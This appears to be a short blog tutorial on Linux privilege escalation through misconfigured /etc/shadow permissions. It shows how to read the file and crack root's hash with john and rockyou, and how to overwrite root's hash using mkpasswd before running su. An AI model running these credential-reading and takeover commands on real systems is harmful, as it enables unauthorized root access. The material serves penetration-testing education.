Linux Privilege Escalation Part 1
After we gain an initial foothold on the machine, the next step is to escalate the privilege of that machine. So in this writeup, we will learn some basic ways to escalate privilege in Linux machines.
1. Readable /etc/shadow file
The “shadow” file in Linux is a system file that stores encrypted user passwords and is accessible only to the root users in most cases. But sometimes due to misconfiguration even normal users can access that file in that case attacker can copy that “root” user hash and try to crack it.
In the given image you can see that everyone can read the “shadow” file. So you can read that file and crack the hash.
1. cat /etc/shadow
2. Copy the hash.
3. Crack it using hashcat.[Only copy hash, no need to copy after:]
Use this command “john — wordlist=/usr/share/wordlists/rockyou.txt hash.txt”
2. Writeable /etc/shadow file
Sometimes you may able to write into the “shadow” file. In this case, you can generate a new password hash and replace the “root” user’s password hash with the new hash.
Password hashes of /etc/shadow file are hashed using the “sha-512” hashing algorithm. So you need to use the same format to hash your new password.
Format of /etc/shadow file
“username:encrypted_password:last_password_change:minimum:maximum:warning:disabled:disabled_date”
- Generate a new password hash with a password of your choice:
mkpasswd -m sha-512 newpasswordhere - Edit the /etc/shadow file and replace the original root user’s password hash with the one you just generated.
Note: Only replace the encrypted password, not other things.
3. Now switch into root user. “su root”
These are how you can perform Privilege Escalation in Linux using /etc/shadow file. Will write more soon.
Thanks for reading.
Twitter:- @BinamraPandey
